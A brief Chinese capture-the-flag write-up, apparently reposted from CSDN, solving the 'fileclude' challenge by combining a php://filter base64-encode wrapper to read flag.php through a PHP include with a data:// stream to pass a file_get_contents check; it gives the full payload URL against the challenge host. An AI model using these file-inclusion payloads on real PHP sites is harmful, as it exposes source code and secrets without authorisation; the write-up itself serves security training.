0


攻防世界-fileclude

场景

在这里插入图片描述
阅读代码后知道存在flag.php,那么flag相关信息肯定就在flag.php中了。但是直接访问flag.php得到的信息只有:
在这里插入图片描述
那么显然易见的就是要配合include(&file)包含用php://filter编码读取flag.php的数据了。同时要满足file_get_contents($file2) === "hello ctf"这一条件。

关于file1

?file1=php://filter/read=convert.base64-encode/resource=flag.php

关于file2

file_get_contents是将文件中数据提取为字符串的函数,它与inclue()一样参数为文件名,所以直接file2=hello%20ctf行不通,要用data://协议构造数据流,使它当作php文件。
?file2=data://text,plain,hello ctf

payload

http://61.147.171.105:55273/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello%20ctf

拿到文件数据的base64
在这里插入图片描述
解码拿到flag
在这里插入图片描述

标签: 网络安全

本文转载自: https://blog.csdn.net/m0_59057526/article/details/126747831
版权归原作者 m0_59057526 所有, 如有侵权,请联系我们删除。

“攻防世界-fileclude”的评论:

还没有评论